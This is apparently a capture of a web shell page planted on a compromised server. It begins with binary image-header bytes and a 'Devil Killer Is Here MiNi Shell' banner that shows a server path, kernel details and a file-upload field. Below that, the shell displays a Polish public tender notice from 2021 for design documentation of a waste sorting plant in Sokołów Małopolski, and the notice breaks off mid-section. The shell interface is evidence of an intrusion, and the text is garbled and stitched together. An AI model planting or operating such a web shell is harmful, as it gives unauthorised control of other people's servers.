JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210726/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210726/0012711402-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00127114 z dnia 2021-07-26</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie kompletnej dokumentacji projektowej Zakładu Sortowania i Przetwarzania Odpadów w Sokołowie Małopolskim wraz z usługą nadzoru autorskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD KOMUNALNY W SOKOŁOWIE MAŁOPOLSKIM SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 180924635</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Łazienna 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sokołów Małopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-050</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 7720 138</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk@sokolow-mlp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zk.sokolow-mlp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka odpadowa i transportowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie kompletnej dokumentacji projektowej Zakładu Sortowania i Przetwarzania Odpadów w Sokołowie Małopolskim wraz z usługą nadzoru autorskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-48deb41c-edff-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00127114</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej Komunikacja między Zamawiającym, a Wykonawcami odbywać się będzie drogą elektroniczną przy użyciu miniPortalu pod adresem: https://miniportal.uzp.gov.pl lub za pomocą poczty elektronicznej, email: ugim@sokolow-mlp.pl (nie dotyczy składania ofert).<br/>2)	Instrukcje korzystania z miniPortalu dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert, odbieranie dokumentów elektronicznych, zmiana lub wycofanie oferty oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu miniPortalu znajdują się w zakładce „Instrukcje” na stronie internetowej pod adresem: https://miniportal.uzp.gov.pl/instrukcje.<br/>3)	Za datę przekazania oferty oraz wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na miniPortal https://miniportal.uzp.gov.pl lub poczty elektronicznej po adresem email: zk@sokolow-mlp.pl.<br/>4)	Dane postępowanie można wyszukać również na liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla wykonawców” lub ze strony głównej z zakładki Postępowania. <br/>5)	Zamawiający, zgodnie z § 3 ust. 3 rozporządzenia Prezesa Rady Ministrów z dnia 27 czerwca 2017 r. w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępniania i przechowywania dokumentów elektronicznych (Dz. U. z 2020 r. poz. 1261) określa niezbędne wymagania techniczne umożliwiające pracę na miniPortalu https://miniportal.uzp.gov.pl tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10,0,<br/>d)	włączona obsługa JavaScript,<br/>e)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f)	miniPortal działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8,<br/>g)	oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. Czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. Szczegółowe informacje dotyczące składania ofert znajdują siew pkt 28 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wypełniając obowiązek informacyjny wynikający z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) informuję, że:<br/>1.	Administratorem Pani/Pana danych osobowych jest Zakład Komunalny w Sokołowie Małopolskim Sp. z o.o.<br/>2.	Administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: zk@sokolow-mlp.pl<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8.	posiada Pani/Pan:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>2)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9.	nie przysługuje Pani/Panu:<br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>10.	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 550000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	W ramach zamierzenia inwestycyjnego należy zaprojektować budowę budynku sortowni wraz z podwójną linią do granulacji tworzyw sztucznych, budynku biurowo-socjalnego, wagi samochodowej, parkingu dla klientów i pracowników, boksów żelbetowych zadaszonych wiatą na odpady segregowane, warsztatu, placu manewrowego i postojowego dla samochodów ciężarowych, naziemnego zbiornika mobilnego na olej napędowy o pojemności 500 l oraz budowę hali do demontażu odpadów wielkogabarytowych. Inwestycja zostanie zlokalizowana w miejscowości Sokołów Małopolski na działkach o nr ewidencyjnych 4233/3, 4236, 4237, 4238, 4234/4, 4235/4, 4239 oraz świadczyć dodatkowe usługi zgodnie z wzorem umowy i OPZ, w tym usługi nadzoru autorskiego.<br/>2.	Przedmiotem niniejszego zamówienia jest opracowanie kompletnej dokumentacji projektowej (projekt budowlany i wykonawczy) budowy Zakładu sortowania i przetwarzania odpadów w Sokołowie Małopolskim wraz z uzyskaniem decyzji o ustaleniu lokalizacji inwestycji celu publicznego, pozwolenia wodnoprawnego, pozwolenia na budowę, zgłoszeń budowy przyłączy a także wszelkich wymaganych w tym celu uzgodnień oraz z usługą nadzoru autorskiego obejmującej: <br/>1) halę posiadającą funkcję: przyjmowania odpadów, sortowania odpadów wraz z niezbędnym wyposażeniem takim jak rozrywarka worków; przenośniki, posiadającej wydzielone części wyznaczone murami oporowymi dostosowanymi do magazynowania i rozładunku/załadunku odpadów, oraz funkcje do przetwarzania odpadów o pow. ok 4188 m2;<br/>2)	budynek socjalno-biurowego o pow. ok 450 m2;<br/>3)	halę do demontażu odpadów wielkogabarytowych o pow. ok 472,5 m2;<br/>4)	8 boksów żelbetowych zadaszonych wiatą na odpady segregowane łącznie ok 1260 m2;<br/>5)	Warsztat o pow. 357 m2;<br/>6)	Placów i układu komunikacyjnego wraz z niezbędną infrastrukturą techniczną ok. 9477 m2 (parkingi, place manewrowe, najazdowa waga samochodowa)<br/>7)	wyposażenie hali o której mowa w pkt 1) w linię sortowniczą, w skład której wchodzić będą urządzenia i maszyny usprawniające proces segregacji i zagospodarowania odpadów – schematy technologicznie ciągów oraz linie do przetwarzania odpadów – z podwójną linią do granulacji tworzyw sztucznych z urządzeniami - w tym z urządzeniami do mycia tworzyw i zakładową oczyszczalnią ścieków przemysłowych w obiegu zamkniętym , a hali o której mowa w pp 3) w niezbędne wyposażenie.<br/><br/>3.	W zakresie prac projektowych mieści się:<br/>1)	kompleksowe oraz kompletne opracowanie całości dokumentacji, o której mowa w art. 103 ust. 1 P.z.p. dla opisanego wyżej przedmiotu zamówienia, zwanej dalej: „Dokumentacją projektową” tj.:<br/>a)	opracowanie projektu zagospodarowania terenu,<br/>b)	opracowanie projektu architektoniczno - budowlanego<br/>c)	opracowanie projektu technicznego i wykonawczego we wszystkich branżach,<br/>d)	opracowanie projektu technologii wraz z wykazem kompleksowego wyposażenia technicznego przewidzianego do zastosowania w poszczególnych obiektach,<br/>e)	opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych<br/>f)	opracowania przedmiarów robót<br/>g)	kosztorysu inwestorskiego, który służyć ma ustaleniu szacowanej wartości zamówienia na roboty budowlane poszczególnych obiektów wraz z ich wyposażeniem,<br/>h)	opracowanie dokumentacji dotyczącej przyłączy wody i kanalizacji sanitarnej, odprowadzania wody burzowej – kanalizacji deszczowej, oraz dokumentacji niezbędnej do uzyskania pozwolenia wodnoprawnego (operat wodnoprawny) - jeśli pozwolenie wodnoprawne będzie wymagane.<br/>i)	Zaprojektowanie dla całego obiektu: sieci teletechnicznych, łączności internetowej , monitoringu wizyjnego, systemów zarządzających dostępem do kompleksu i poszczególnych budynków, systemów p.poż., wentylacji.<br/><br/>4.	Wykonawca w ramach umowy uzyska w imieniu Zamawiającego: decyzję o ustaleniu lokalizacji inwestycji celu publicznego, ew. decyzję pozwolenia wodnoprawnego, decyzję zatwierdzającą projekt budowlany i udzielającą pozwolenia na budowę inwestycji będącej przedmiotem zamówienia, będzie prowadził sprawy formalno-prawnych związane z realizacją prac projektowych, w szczególności działając w imieniu Zamawiającego pozyska wszelkie wymagane przepisami prawa opinie, uzgodnienia, pozwolenia na podstawie których możliwym będzie wykonanie robót budowlanych inwestycji będącej przedmiotem zamówienia,<br/>5.	Wykonawca w ramach zawartej umowy będzie pełnił nadzór autorski w okresie realizacji robót budowlanych wykonywanych na podstawie opracowanej Dokumentacji projektowej, jak również będzie wykonywał inne usług i realizował obowiązki powiązane z usługami wymienionymi powyżej<br/>6.	Wykonawca w trakcie prowadzenia przez Zamawiającego postępowania o udzielenie zamówienia publicznego na realizację robót budowlanych będzie uczestniczył w tym postępowaniu po stronie Zamawiającego, opracowując projekty odpowiedzi dotyczących dokumentacji przetargowej, bądź będzie dokonywał modyfikacji dokumentacji przetargowej,<br/>7.	Przedmiot umowy będzie dotyczył przedsięwzięcia pn.: BUDOWA ZAKŁADU DO PRZETWARZANIA ODPADÓW KOMUNALNYCH W SOKOŁOWIE MAŁOPOLSKIM ORAZ PRZEBUDOWA ROWU I WYKONANIE URZĄDZENIA WODNEGO, dla przytoczonego zadania wydana została decyzja środowiskowa- nieprawomocna.<br/>8.	Przedmiot umowy ma być sporządzony i przekazany do Zamawiającego wyłącznie w języku Polskim.<br/>5.	Szczegółowy opis przedmiotu zamówienia, tj. zakres obowiązków i uprawnień składających się na przedmiot oraz sposób i zakres realizacji usług zawarty jest w – Opisie Przedmiotu Zamówienia (OPZ) oraz załącznikach – koncepcjach, Programie Funkcjonalno Użytkowym (PFU) , które udostępnia się razem z SWZ w zał. 4,5,8,9,10 do SWZ. Przedmiot umowy (przetargu) ma być zgodny z dotychczasowymi ustaleniami: koncepcją , PFU, SWZ, opisami – udostępnionymi w załącznikach do SWZ, dokonanie odstępstwa musi być poprzedzone zgodą Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71321000-4 - Usługi inżynierii projektowej dla mechanicznych i elektrycznych instalacji budowlanych</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71323000-8 - Usługi inżynierii projektowej w zakresie przetwarzania przemysłowego i produkcji przemysłowej</p> <p class="mb-0">71323100-9 - Usługi projektowania systemów zasilania energią elektryczną</p> <p class="mb-0">71323200-0 - Projektowe usługi inżynieryjne w zakresie zakładów</p> <p class="mb-0">79421200-3 - Usługi projektowe inne niż w zakresie robót budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp, do wartości 20% zamówienia podstawowego polegających na powtórzeniu podobnych usług t.j. w szczególności w przypadku konieczności realizacji usług projektowych w okresie przedłużonego okresu wykonawstwa robót budowalnych lub realizacji usług projektowania lub robót budowlanych w szerszym aniżeli pierwotnie zakładano zakresie, w tym koniecznością sprawowania nadzoru autorskiego nad robotami podobnymi lub dodatkowymi lub robotami zamiennymi o wyższym stopniu skomplikowania technicznego, względnie związanych z koniecznością wykonywania usług doradczych w zakresie związanym z koniecznością wyłonienia nowych wykonawców Robót. Udzielenie zamówienia podobnego może polegać w szczególności na nabyciu przez Zamawiającego od Wykonawcy usług dodatkowych względem przewidzianych w niniejszym zamówieniu, tj. świadczenia lub świadczeń pozostających poza zakresem zobowiązania Wykonawcy.<br/>Udzielenie zamówienia lub zamówień podobnych uzależnione jest od należytego wykonywania przez Wykonawcę zamówienia podstawowego, dysponowania przez Zamawiającego odpowiednimi środkami finansowymi oraz nastąpi na warunkach zbieżnych z przewidzianymi w niniejszym postępowaniu (wzór umowy), przy uwzględnieniu różnic wynikających ze specyfiki udzielanego zamówienia podobnego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Oferty zostaną ocenione przez Zamawiającego w oparciu o nastepujace kryterium: <br/><br/>A) Cena (C) – waga 60%<br/>B)	Rękojmia na przedmiot umowy na okres 36 miesięcy lub dłuższy, waga kryterium 40%. (0 lub 40 pkt) <br/>Minimalny okres rękojmi, aby oferta była zgodna z SWZ to 24 miesięcy.<br/>Zadeklarowanie okresu krótszego niż 24 miesięcy będzie skutkowało odrzuceniem oferty.<br/>Zadeklarowanie okresu 24 miesięcy i dłuższego niż 24 miesięcy ale krótszego niż 36 będzie prawidłowe i oferta będzie ważna, lecz nie przyzna się dodatkowych 40 punktów.<br/>Zadeklarowanie okresu 36 miesięcy lub dłuższego niż 36 miesięcy spowoduje uzyskanie dodatkowych 40 punktów, za okres dłuższy niż 36 miesięcy przyznane będzie również 40 punktów , tak samo jak za okres równy 36 miesięcy. Razem maksymalnie można zdobyć za wszystkie kryteria 100 punktów.<br/>Punktacja całkowita oferty to punktacja za kryterium cena + za kryterium rękojmia.<br/>Wybierze się ofertę z największą liczbą punktów. <br/>	Zasada oceny ofert w kryterium cena: <br/>	Cena (C) – waga 60%<br/> cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60%<br/> cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>	Podstawą przyznania punktów w kryterium „cena” będzie całkowita cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą- z największą liczbą punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> 